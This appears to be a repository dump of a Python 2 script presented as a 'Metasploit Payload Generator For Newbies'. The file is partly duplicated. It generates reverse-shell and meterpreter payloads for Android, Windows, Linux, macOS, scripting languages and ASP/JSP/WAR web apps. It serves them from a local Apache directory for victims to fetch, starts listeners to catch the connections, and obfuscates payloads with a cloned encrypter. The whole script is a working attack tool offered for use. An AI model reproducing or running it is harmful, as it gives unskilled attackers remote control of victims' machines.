371 | use exploit/multi/handler
372 | set PAYLOAD cmd/unix/reverse_perl
373 | set LHOST {0}
374 | set LPORT {1}
375 | exploit
376 | """.format(lhost,lport)
377 | with open('listener.rc', 'w') as f :
378 | f.write(listen)
379 | os.system('msfconsole -r listener.rc')
380 |
381 |
382 | def bash():
383 | lhost = raw_input("Enter LHOST: ")
384 | lport = raw_input("Enter LPORT: ")
385 | name = raw_input("Enter Payload Name: ")
386 | os.system("msfvenom -p cmd/unix/reverse_bash LHOST=%s LPORT=%s -f raw > %s.sh"%(lhost,lport,name))
387 | clear()
388 | print "Payload Successfuly Generated"
389 | print "[1]-Do You Want To Start a listenner"
390 | print "[2]-Do You Want To Start an IP Poisener "
391 | li = raw_input()
392 | if li == '2' :
393 | os.system('sudo service apache2 start')
394 | os.system('sudo cp %s.sh /var/www/html'%(name))
395 | print "Your IP Successfully Poisened : %s/%s.sh"%(lhost,name)
396 | listen = """
397 | use exploit/multi/handler
398 | set PAYLOAD cmd/unix/reverse_bash
399 | set LHOST {0}
400 | set LPORT {1}
401 | exploit
402 | """.format(lhost,lport)
403 | with open('listener.rc', 'w') as f :
404 | f.write(listen)
405 | os.system('msfconsole -r listener.rc')
406 |
407 | else :
408 | listen = """
409 | use exploit/multi/handler
410 | set PAYLOAD cmd/unix/reverse_bash
411 | set LHOST {0}
412 | set LPORT {1}
413 | exploit
414 | """.format(lhost,lport)
415 | with open('listener.rc', 'w') as f :
416 | f.write(listen)
417 | os.system('msfconsole -r listener.rc')
418 | def asp():
419 | lhost = raw_input("Enter LHOST: ")
420 | lport = raw_input("Enter LPORT: ")
421 | name = raw_input("Enter Payload Name: ")
422 | os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f asp > %s.asp"%(lhost,lport,name))
423 | clear()
424 | print "Payload Successfuly Generated"
425 | print "[1]-Do You Want To Start a listenner"
426 | print "[2]-Do You Want To Start an IP Poisener "
427 | li = raw_input()
428 | if li == '2' :
429 | os.system('sudo service apache2 start')
430 | os.system('sudo cp %s.asp /var/www/html'%(name))
431 | print "Your IP Successfully Poisened : %s/%s.asp"%(lhost,name)
432 | listen = """
433 | use exploit/multi/handler
434 | set PAYLOAD windows/meterpreter/reverse_tcp
435 | set LHOST {0}
436 | set LPORT {1}
437 | exploit
438 | """.format(lhost,lport)
439 | with open('listener.rc', 'w') as f :
440 | f.write(listen)
441 | os.system('msfconsole -r listener.rc')
442 |
443 | listen = """
444 | use exploit/multi/handler
445 | set PAYLOAD windows/meterpreter/reverse_tcp
446 | set LHOST {0}
447 | set LPORT {1}
448 | exploit
449 | """.format(lhost,lport)
450 | with open('listener.rc', 'w') as f :
451 | f.write(listen)
452 | os.system('msfconsole -r listener.rc')
453 |
454 | else :
455 | listen = """
456 | use exploit/multi/handler
457 | set PAYLOAD windows/meterpreter/reverse_tcp
458 | set LHOST {0}
459 | set LPORT {1}
460 | exploit
461 | """.format(lhost,lport)
462 | with open('listener.rc', 'w') as f :
463 | f.write(listen)
464 | os.system('msfconsole -r listener.rc')
465 | def jsp():
466 | lhost = raw_input("Enter LHOST: ")
467 | lport = raw_input("Enter LPORT: ")
468 | name = raw_input("Enter Payload Name: ")
469 | os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%s -f raw > %s.jsp"%(lhost,lport,name))
470 | clear()
471 | print "Payload Successfuly Generated"
472 | print "[1]-Do You Want To Start a listenner"
473 | print "[2]-Do You Want To Start an IP Poisener "
474 | li = raw_input()
475 | if li == '2' :
476 | os.system('sudo service apache2 start')
477 | os.system('sudo cp %s.jsp /var/www/html'%(name))
478 | print "Your IP Successfully Poisened : %s/%s.jsp"%(lhost,name)
479 | listen = """
480 | use exploit/multi/handler
481 | set PAYLOAD java/jsp_shell_reverse_tcp
482 | set LHOST {0}
483 | set LPORT {1}
484 | exploit
485 | """.format(lhost,lport)
486 | with open('listener.rc', 'w') as f :
487 | f.write(listen)
488 | os.system('msfconsole -r listener.rc')
489 |
490 | else :
491 | listen = """
492 | use exploit/multi/handler
493 | set PAYLOAD java/jsp_shell_reverse_tcp
494 | set LHOST {0}
495 | set LPORT {1}
496 | exploit
497 | """.format(lhost,lport)
498 | with open('listener.rc', 'w') as f :
499 | f.write(listen)
500 | os.system('msfconsole -r listener.rc')
501 | def war():
502 | lhost = raw_input("Enter LHOST: ")
503 | lport = raw_input("Enter LPORT: ")
504 | name = raw_input("Enter Payload Name: ")
505 | os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%s -f war > %s.war"%(lhost,lport,name))
506 | clear()
507 | print "Payload Successfuly Generated"
508 | print "[1]-Do You Want To Start a listenner"
509 | print "[2]-Do You Want To Start an IP Poisener "
510 | li = raw_input()
511 | if li == '2' :
512 | os.system('sudo service apache2 start')
513 | os.system('sudo cp %s.war /var/www/html'%(name))
514 | print "Your IP Successfully Poisened : %s/%s.war"%(lhost,name)
515 | listen = """
516 | use exploit/multi/handler
517 | set PAYLOAD java/jsp_shell_reverse_tcp
518 | set LHOST {0}
519 | set LPORT {1}
520 | exploit
521 | """.format(lhost,lport)
522 | with open('listener.rc', 'w') as f :
523 | f.write(listen)
524 | os.system('msfconsole -r listener.rc')
525 |
526 | else :
527 | listen = """
528 | use exploit/multi/handler
529 | set PAYLOAD java/jsp_shell_reverse_tcp
530 | set LHOST {0}
531 | set LPORT {1}
532 | exploit
533 | """.format(lhost,lport)
534 | with open('listener.rc', 'w') as f :
535 | f.write(listen)
536 | os.system('msfconsole -r listener.rc')
537 |
538 | def apkenc():
539 | filename = raw_input("Enter Your Payload Name (ex.apk) : ")
540 | os.system("keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000")
541 | os.system("jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore %s alias_name"%(filename))
542 | print("Your Payload Has Been Successfully Encrypted !")
543 |
544 | def pyenc():
545 | check = raw_input("Is It Your First Time ? (y/N) :")
546 | pypayload = raw_input("Enter Your Python Payload Name (ex.py) : ")
547 | pyoutput = raw_input("Enter The Output Name of Your Payload : ")
548 | if check in no:
549 | os.system("cd NXcrypt && sudo python NXcrypt.py -f ../%s -o ../%s"%(pypayload,pyoutput))
550 | else:
551 | os.system("git clone https://github.com/Hadi999/NXcrypt.git")
552 | os.system("cd NXcrypt && sudo python NXcrypt.py -f ../%s -o ../%s"%(pypayload,pyoutput))
553 |
554 | #################### BEGIN #######################
555 | print("-----------------------------------------------")
556 | print("Is Metasploit Installed In Your Machine ? (Y/N)")
557 | print("-----------------------------------------------")
558 |
559 | mscheck = raw_input("Answer: ")
560 | if mscheck in no:
561 | msf()
562 | elif mscheck in yes:
563 | banner()
564 | else:
565 | banner()
566 |
--------------------------------------------------------------------------------
/core/run.py:
--------------------------------------------------------------------------------
1 | #Executable Python Script
2 | #Coded_By_Saqib_S_Khan
3 |
4 | import os
5 | import sys
6 | import urllib
7 | ##################################
8 | yes = set(['yes','y', 'ye', 'Y'])
9 | no = set(['no','n'])
10 | G = '\033[92m' #green
11 | Y = '\033[93m' #yellow
12 | B = '\033[94m' #blue
13 | R = '\033[91m' #red
14 | W = '\033[0m' #white
15 | ##################################
16 | #################### Banner #######################
17 |
18 | def banner():
19 | print ("""
20 |
21 | %s_ _ _____ _ _ _
22 |
23 | "mm m mmmmmm ""# " m$
24 | ## m m mm#mm mmm # m m mmmm # mmm mmm mm#mm$
25 | # # # # # #" "# #mmmmm #m# #" "# # #" "# # #$
26 | #mm# # # # # # # m#m # # # # # # #$
27 | # # "mm"# "mm "#m#" #mmmmm m" "m ##m#" "mm "#m#" mm#mm "mm$
28 | #
29 |
30 | %s
31 | |_|
32 | [+] Metasploit Payload Generator For Newbies [+]
33 | [+] Edited By Mr ROBOT & AutoExploit Team [+]
34 | [+] Email : MrPentester@pm.me [+]
35 |
36 |
37 | %s
38 | List payloads:
39 |
40 | 1) Binaries Payloads
41 | 2) Scripting Payloads
42 | 3) Web Payloads
43 | 4) Encrypters
44 | 0) Exit
45 | """%(R,G,B))
46 | banner = raw_input(" Select from the menu : ")
47 | print("")
48 |
49 | if banner == "1":
50 | bin()
51 | elif banner == "2":
52 | script()
53 | elif banner == "3":
54 | web()
55 | elif banner == "4":
56 | enc()
57 |
58 | else:
59 | sys.exit();
60 | #################### BANNER #######################
61 |
62 | def msf():
63 | print "Do You Want To Install it ? : "
64 | ch = raw_input()
65 | if ch in yes :
66 | os.system("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall")
67 | else :
68 | print "OK BB !"
69 | sys.exit(0)
70 |
71 |
72 | def clear():
73 | if os.name == 'nt':
74 | os.system('cls')
75 | else:
76 | os.system('clear')
77 | ###############################
78 | def bin():
79 | print("""
80 | 1) Android
81 | 2) Windows
82 | 3) Linux
83 | 4) Mac OS
84 | 0) Back to menu
85 | """)
86 |
87 | bn = raw_input("Set Payload: ")
88 | print("")
89 | if bn == "1":
90 | android()
91 | elif bn == "2":
92 | windows()
93 | elif bn == "3":
94 | linux()
95 | elif bn == "4":
96 | mac()
97 | else:
98 | banner()
99 |
100 | def web():
101 | print("""
102 | 1) ASP
103 | 2) JSP
104 | 3) War
105 | 0) Back to menu
106 |
107 | """)
108 |
109 | wb = raw_input("Set Payload: ")
110 | print("")
111 | if wb == "1":
112 | asp()
113 | elif wb == "2":
114 | jsp()
115 | elif wb == "3":
116 | war()
117 | else:
118 | banner()
119 |
120 | def script():
121 | print("""
122 | 1) Python
123 | 2) Perl
124 | 3) Bash
125 | 0) Back to menu
126 |
127 | """)
128 |
129 | sc = raw_input("Set Payload: ")
130 | print("")
131 | if sc == "1":
132 | python()
133 | elif sc == "2":
134 | perl()
135 | elif sc == "3":
136 | bash()
137 | else:
138 | banner()
139 |
140 | def enc():
141 | print("""
142 | 1) APK Encrypter
143 | 2) Python Encrypter
144 | 0) Back to menu
145 |
146 | """)
147 | en = raw_input("Select Encrypter : ")
148 | print("")
149 | if en == "1":
150 | apkenc()
151 | elif en == "2":
152 | pyenc()
153 | else:
154 | banner()
155 |
156 |
157 | def android():
158 | lhost = raw_input("Enter LHOST: ")
159 | lport = raw_input("Enter LPORT: ")
160 | name = raw_input("Enter Payload Name: ")
161 | os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s R > %s.apk"%(lhost,lport,name))
162 | clear()
163 | print "Payload Successfuly Generated"
164 | print "[1]-Do You Want To Start a listenner"
165 | print "[2]-Do You Want To Start an IP Poisener "
166 | li = raw_input()
167 | if li == '2' :
168 | os.system('sudo service apache2 start')
169 | os.system('sudo cp %s.apk /var/www/html'%(name))
170 | print "Your IP Successfully Poisened : %s/%s.apk"%(lhost,name)
171 | listen = """
172 | use exploit/multi/handler
173 | set PAYLOAD android/meterpreter/reverse_tcp
174 | set LHOST {0}
175 | set LPORT {1}
176 | exploit
177 | """.format(lhost,lport)
178 | with open('listener.rc', 'w') as f :
179 | f.write(listen)
180 | os.system('msfconsole -r listener.rc')
181 |
182 | else :
183 | listen = """
184 | use exploit/multi/handler
185 | set PAYLOAD android/meterpreter/reverse_tcp
186 | set LHOST {0}
187 | set LPORT {1}
188 | exploit
189 | """.format(lhost,lport)
190 | with open('listener.rc', 'w') as f :
191 | f.write(listen)
192 | os.system('msfconsole -r listener.rc')
193 | def windows():
194 | lhost = raw_input("Enter LHOST: ")
195 | lport = raw_input("Enter LPORT: ")
196 | name = raw_input("Enter Payload Name: ")
197 | os.system("msfvenom -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -f exe > %s.exe"%(lhost,lport,name))
198 | clear()
199 | print "Payload Successfuly Generated"
200 | print "[1]-Do You Want To Start a listenner"
201 | print "[2]-Do You Want To Start an IP Poisener "
202 | li = raw_input()
203 | if li == '2' :
204 | os.system('sudo service apache2 start')
205 | os.system('sudo cp %s.exe /var/www/html'%(name))
206 | print "Your IP Successfully Poisened : %s/%s.exe"%(lhost,name)
207 | listen = """
208 | use exploit/multi/handler
209 | set PAYLOAD windows/shell/reverse_tcp
210 | set LHOST {0}
211 | set LPORT {1}
212 | exploit
213 | """.format(lhost,lport)
214 | with open('listener.rc', 'w') as f :
215 | f.write(listen)
216 | os.system('msfconsole -r listener.rc')
217 |
218 | else :
219 | listen = """
220 | use exploit/multi/handler
221 | set PAYLOAD windows/shell/reverse_tcp
222 | set LHOST {0}
223 | set LPORT {1}
224 | exploit
225 | """.format(lhost,lport)
226 | with open('listener.rc', 'w') as f :
227 | f.write(listen)
228 | os.system('msfconsole -r listener.rc')
229 |
230 | def linux():
231 | lhost = raw_input("Enter LHOST: ")
232 | lport = raw_input("Enter LPORT: ")
233 | name = raw_input("Enter Payload Name: ")
234 | os.system("msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f elf > %s.elf"%(lhost,lport,name))
235 | clear()
236 | print "Payload Successfuly Generated"
237 | print "[1]-Do You Want To Start a listenner"
238 | print "[2]-Do You Want To Start an IP Poisener "
239 | li = raw_input()
240 | if li == '2' :
241 | os.system('sudo service apache2 start')
242 | os.system('sudo cp %s.elf /var/www/html'%(name))
243 | print "Your IP Successfully Poisened : %s/%s.elf"%(lhost,name)
244 | listen = """
245 | use exploit/multi/handler
246 | set PAYLOAD linux/x86/meterpreter/reverse_tcp
247 | set LHOST {0}
248 | set LPORT {1}
249 | exploit
250 | """.format(lhost,lport)
251 | with open('listener.rc', 'w') as f :
252 | f.write(listen)
253 | os.system('msfconsole -r listener.rc')
254 |
255 | else :
256 | listen = """
257 | use exploit/multi/handler
258 | set PAYLOAD linux/x86/meterpreter/reverse_tcp
259 | set LHOST {0}
260 | set LPORT {1}
261 | exploit
262 | """.format(lhost,lport)
263 | with open('listener.rc', 'w') as f :
264 | f.write(listen)
265 | os.system('msfconsole -r listener.rc')
266 |
267 |
268 | def mac():
269 | lhost = raw_input("Enter LHOST: ")
270 | lport = raw_input("Enter LPORT: ")
271 | name = raw_input("Enter Payload Name: ")
272 | os.system("msfvenom -p osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s -f macho > %s.macho"%(lhost,lport,name))
273 | clear()
274 | print "Payload Successfuly Generated"
275 | print "[1]-Do You Want To Start a listenner"
276 | print "[2]-Do You Want To Start an IP Poisener "
277 | li = raw_input()
278 | if li == '2' :
279 | os.system('sudo service apache2 start')
280 | os.system('sudo cp %s.macho /var/www/html'%(name))
281 | print "Your IP Successfully Poisened : %s/%s.macho"%(lhost,name)
282 | listen = """
283 | use exploit/multi/handler
284 | set PAYLOAD osx/x86/shell_reverse_tcp
285 | set LHOST {0}
286 | set LPORT {1}
287 | exploit
288 | """.format(lhost,lport)
289 | with open('listener.rc', 'w') as f :
290 | f.write(listen)
291 | os.system('msfconsole -r listener.rc')
292 |
293 | else :
294 | listen = """
295 | use exploit/multi/handler
296 | set PAYLOAD osx/x86/shell_reverse_tcp
297 | set LHOST {0}
298 | set LPORT {1}
299 | exploit
300 | """.format(lhost,lport)
301 | with open('listener.rc', 'w') as f :
302 | f.write(listen)
303 | os.system('msfconsole -r listener.rc')
304 |
305 |
306 |
307 | def python():
308 | lhost = raw_input("Enter LHOST: ")
309 | lport = raw_input("Enter LPORT: ")
310 | name = raw_input("Enter Payload Name: ")
311 | os.system("msfvenom -p cmd/unix/reverse_python LHOST=%s LPORT=%s -f raw > %s.py"%(lhost,lport,name))
312 | clear()
313 | print "Payload Successfuly Generated"
314 | print "[1]-Do You Want To Start a listenner"
315 | print "[2]-Do You Want To Start an IP Poisener "
316 | li = raw_input()
317 | if li == '2' :
318 | os.system('sudo service apache2 start')
319 | os.system('sudo cp %s.py /var/www/html'%(name))
320 | print "Your IP Successfully Poisened : %s/%s.py"%(lhost,name)
321 | listen = """
322 | use exploit/multi/handler
323 | set PAYLOAD cmd/unix/reverse_python
324 | set LHOST {0}
325 | set LPORT {1}
326 | exploit
327 | """.format(lhost,lport)
328 | with open('listener.rc', 'w') as f :
329 | f.write(listen)
330 | os.system('msfconsole -r listener.rc')
331 |
332 | else :
333 | listen = """
334 | use exploit/multi/handler
335 | set PAYLOAD cmd/unix/reverse_python
336 | set LHOST {0}
337 | set LPORT {1}
338 | exploit
339 | """.format(lhost,lport)
340 | with open('listener.rc', 'w') as f :
341 | f.write(listen)
342 | os.system('msfconsole -r listener.rc')
343 |
344 |
345 | def perl():
346 | lhost = raw_input("Enter LHOST: ")
347 | lport = raw_input("Enter LPORT: ")
348 | name = raw_input("Enter Payload Name: ")
349 | os.system("msfvenom -p cmd/unix/reverse_perl LHOST=%s LPORT=%s -f raw > %s.pl"%(lhost,lport,name))
350 | clear()
351 | print "Payload Successfuly Generated"
352 | print "[1]-Do You Want To Start a listenner"
353 | print "[2]-Do You Want To Start an IP Poisener "
354 | li = raw_input()
355 | if li == '2' :
356 | os.system('sudo service apache2 start')
357 | os.system('sudo cp %s.pl /var/www/html'%(name))
358 | print "Your IP Successfully Poisened : %s/%s.pl"%(lhost,name)
359 | listen = """
360 | use exploit/multi/handler
361 | set PAYLOAD cmd/unix/reverse_perl
362 | set LHOST {0}
363 | set LPORT {1}
364 | exploit
365 | """.format(lhost,lport)
366 | with open('listener.rc', 'w') as f :
367 | f.write(listen)
368 | os.system('msfconsole -r listener.rc')
369 |
370 | else :
371 | listen = """
372 | use exploit/multi/handler
373 | set PAYLOAD cmd/unix/reverse_perl
374 | set LHOST {0}
375 | set LPORT {1}
376 | exploit
377 | """.format(lhost,lport)
378 | with open('listener.rc', 'w') as f :
379 | f.write(listen)
380 | os.system('msfconsole -r listener.rc')
381 |
382 |
383 | def bash():
384 | lhost = raw_input("Enter LHOST: ")
385 | lport = raw_input("Enter LPORT: ")
386 | name = raw_input("Enter Payload Name: ")
387 | os.system("msfvenom -p cmd/unix/reverse_bash LHOST=%s LPORT=%s -f raw > %s.sh"%(lhost,lport,name))
388 | clear()
389 | print "Payload Successfuly Generated"
390 | print "[1]-Do You Want To Start a listenner"
391 | print "[2]-Do You Want To Start an IP Poisener "
392 | li = raw_input()
393 | if li == '2' :
394 | os.system('sudo service apache2 start')
395 | os.system('sudo cp %s.sh /var/www/html'%(name))
396 | print "Your IP Successfully Poisened : %s/%s.sh"%(lhost,name)
397 | listen = """
398 | use exploit/multi/handler
399 | set PAYLOAD cmd/unix/reverse_bash
400 | set LHOST {0}
401 | set LPORT {1}
402 | exploit
403 | """.format(lhost,lport)
404 | with open('listener.rc', 'w') as f :
405 | f.write(listen)
406 | os.system('msfconsole -r listener.rc')
407 |
408 | else :
409 | listen = """
410 | use exploit/multi/handler
411 | set PAYLOAD cmd/unix/reverse_bash
412 | set LHOST {0}
413 | set LPORT {1}
414 | exploit
415 | """.format(lhost,lport)
416 | with open('listener.rc', 'w') as f :
417 | f.write(listen)
418 | os.system('msfconsole -r listener.rc')
419 | def asp():
420 | lhost = raw_input("Enter LHOST: ")
421 | lport = raw_input("Enter LPORT: ")
422 | name = raw_input("Enter Payload Name: ")
423 | os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f asp > %s.asp"%(lhost,lport,name))
424 | clear()
425 | print "Payload Successfuly Generated"
426 | print "[1]-Do You Want To Start a listenner"
427 | print "[2]-Do You Want To Start an IP Poisener "
428 | li = raw_input()
429 | if li == '2' :
430 | os.system('sudo service apache2 start')
431 | os.system('sudo cp %s.asp /var/www/html'%(name))
432 | print "Your IP Successfully Poisened : %s/%s.asp"%(lhost,name)
433 | listen = """
434 | use exploit/multi/handler
435 | set PAYLOAD windows/meterpreter/reverse_tcp
436 | set LHOST {0}
437 | set LPORT {1}
438 | exploit
439 | """.format(lhost,lport)
440 | with open('listener.rc', 'w') as f :
441 | f.write(listen)
442 | os.system('msfconsole -r listener.rc')
443 |
444 | listen = """
445 | use exploit/multi/handler
446 | set PAYLOAD windows/meterpreter/reverse_tcp
447 | set LHOST {0}
448 | set LPORT {1}
449 | exploit
450 | """.format(lhost,lport)
451 | with open('listener.rc', 'w') as f :
452 | f.write(listen)
453 | os.system('msfconsole -r listener.rc')
454 |
455 | else :
456 | listen = """
457 | use exploit/multi/handler
458 | set PAYLOAD windows/meterpreter/reverse_tcp
459 | set LHOST {0}
460 | set LPORT {1}
461 | exploit
462 | """.format(lhost,lport)
463 | with open('listener.rc', 'w') as f :
464 | f.write(listen)
465 | os.system('msfconsole -r listener.rc')
466 | def jsp():
467 | lhost = raw_input("Enter LHOST: ")
468 | lport = raw_input("Enter LPORT: ")
469 | name = raw_input("Enter Payload Name: ")
470 | os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%s -f raw > %s.jsp"%(lhost,lport,name))
471 | clear()
472 | print "Payload Successfuly Generated"
473 | print "[1]-Do You Want To Start a listenner"
474 | print "[2]-Do You Want To Start an IP Poisener "
475 | li = raw_input()
476 | if li == '2' :
477 | os.system('sudo service apache2 start')
478 | os.system('sudo cp %s.jsp /var/www/html'%(name))
479 | print "Your IP Successfully Poisened : %s/%s.jsp"%(lhost,name)
480 | listen = """
481 | use exploit/multi/handler
482 | set PAYLOAD java/jsp_shell_reverse_tcp
483 | set LHOST {0}
484 | set LPORT {1}
485 | exploit
486 | """.format(lhost,lport)
487 | with open('listener.rc', 'w') as f :
488 | f.write(listen)
489 | os.system('msfconsole -r listener.rc')
490 |
491 | else :
492 | listen = """
493 | use exploit/multi/handler
494 | set PAYLOAD java/jsp_shell_reverse_tcp
495 | set LHOST {0}
496 | set LPORT {1}
497 | exploit
498 | """.format(lhost,lport)
499 | with open('listener.rc', 'w') as f :
500 | f.write(listen)
501 | os.system('msfconsole -r listener.rc')
502 | def war():
503 | lhost = raw_input("Enter LHOST: ")
504 | lport = raw_input("Enter LPORT: ")
505 | name = raw_input("Enter Payload Name: ")
506 | os.system("msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%s -f war > %s.war"%(lhost,lport,name))
507 | clear()
508 | print "Payload Successfuly Generated"
509 | print "[1]-Do You Want To Start a listenner"
510 | print "[2]-Do You Want To Start an IP Poisener "
511 | li = raw_input()
512 | if li == '2' :
513 | os.system('sudo service apache2 start')
514 | os.system('sudo cp %s.war /var/www/html'%(name))
515 | print "Your IP Successfully Poisened : %s/%s.war"%(lhost,name)
516 | listen = """
517 | use exploit/multi/handler
518 | set PAYLOAD java/jsp_shell_reverse_tcp
519 | set LHOST {0}
520 | set LPORT {1}
521 | exploit
522 | """.format(lhost,lport)
523 | with open('listener.rc', 'w') as f :
524 | f.write(listen)
525 | os.system('msfconsole -r listener.rc')
526 |
527 | else :
528 | listen = """
529 | use exploit/multi/handler
530 | set PAYLOAD java/jsp_shell_reverse_tcp
531 | set LHOST {0}
532 | set LPORT {1}
533 | exploit
534 | """.format(lhost,lport)
535 | with open('listener.rc', 'w') as f :
536 | f.write(listen)
537 | os.system('msfconsole -r listener.rc')
538 |
539 | def apkenc():
540 | filename = raw_input("Enter Your Payload Name (ex.apk) : ")
541 | os.system("keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000")
542 | os.system("jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore %s alias_name"%(filename))
543 | print("Your Payload Has Been Successfully Encrypted !")
544 |
545 | def pyenc():
546 | check = raw_input("Is It Your First Time ? (y/N) :")
547 | pypayload = raw_input("Enter Your Python Payload Name (ex.py) : ")
548 | pyoutput = raw_input("Enter The Output Name of Your Payload : ")
549 | if check in no:
550 | os.system("cd NXcrypt && sudo python NXcrypt.py -f ../%s -o ../%s"%(pypayload,pyoutput))
551 | else:
552 | os.system("git clone https://github.com/Hadi999/NXcrypt.git")
553 | os.system("cd NXcrypt && sudo python NXcrypt.py -f ../%s -o ../%s"%(pypayload,pyoutput))
554 |
555 | #################### BEGIN #######################
556 | print("-----------------------------------------------")
557 | print("Is Metasploit Installed In Your Machine ? (Y/N)")
558 | print("-----------------------------------------------")
559 |
560 | mscheck = raw_input("Answer: ")
561 | if mscheck in no:
562 | msf()
563 | elif mscheck in yes:
564 | banner()
565 | else:
566 | banner()
567 |
--------------------------------------------------------------------------------